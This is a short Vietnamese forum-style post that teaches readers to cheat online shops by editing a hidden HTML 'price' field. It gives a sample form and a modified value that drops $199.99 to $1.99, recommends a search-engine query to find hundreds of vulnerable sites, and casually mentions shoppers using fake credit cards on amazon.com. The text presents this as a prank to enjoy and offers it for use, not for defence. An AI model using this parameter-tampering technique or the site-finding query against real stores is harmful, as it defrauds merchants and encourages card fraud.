Hiện nay rất nhiều công ty kinh doanh qua mạng internet bán sản phẩm và dịch vụ của họ cho người duyệt web. 1 ví dụ tiêu biểu nhất mà chúng ta thường hay đến thăm là
www.amazon.com rất nhiều bác hay vào đây với cái cc giả trên tay để mua sách . Nhưng do 1 số sai sót sơ đẳng trong viết mã của người lập trình đó là họ dùng tag ẩn HTML làm cơ chế gán giá cho 1 món hàng cụ thể(vì dùng cái này nhanh). Hậu quả là nếu phát hiện chỗ yếu này, chúng ta có thể thay đổi tag ẩn và làm giảm đi đáng kể so với giá ban đầu. Hì hì thích không? .
Giả sử địa điểm web có mã HTML sau trên trang mua hàng:
<FORM ACTION="http://www.tenweb.com/cgi-bin/muahang.pl" method="post">
<input type=hidden name="price" value="199.99">
<input type=hidden name="prd_id"value="ten mon hang">
QUANTITY: <input type=text name= "quant" size=3 maxlength=3 value=1>
</FORM>
Lúc đó ta có thể thay đổi giá cả = 1 trình soạn thảo cho phép đưa ra giá là $1.99 thay vì $199.99
<input type=hidden name="price" value="1.99">
Chúng ta có thể tìm những trang web như vậy = các search engine với từ khoá "type=hidden name=price" để thấy hàng trăm trang web bị lỗi này.
chú ý rằng cái value luôn không có đơn vị tiền chẳng hạn nếu ta muốn là 2$ thì chỉ điền giá trị là 2 thôi.
